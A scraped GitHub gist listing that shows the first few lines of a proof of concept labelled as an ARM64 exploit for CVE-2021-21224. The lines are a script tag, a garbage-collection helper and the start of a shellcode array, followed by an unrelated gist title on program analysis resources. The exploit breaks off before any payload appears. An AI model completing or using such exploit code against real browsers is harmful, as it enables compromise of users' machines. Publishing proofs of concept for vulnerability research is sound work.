Skip to content

Instantly share code, notes, and snippets.

@wdormann
wdormann / CVE-2021-21224.html
Last active October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
<script>
function gc() {
for (var i = 0; i < 0x80000; ++i) {
var a = new ArrayBuffer();
}
}
let shellcode = [
// Move x18 to x28 (TEB)
@MattPD
MattPD / analysis.draft.md
Last active February 22, 2026 07:22
Program Analysis Resources (WIP draft)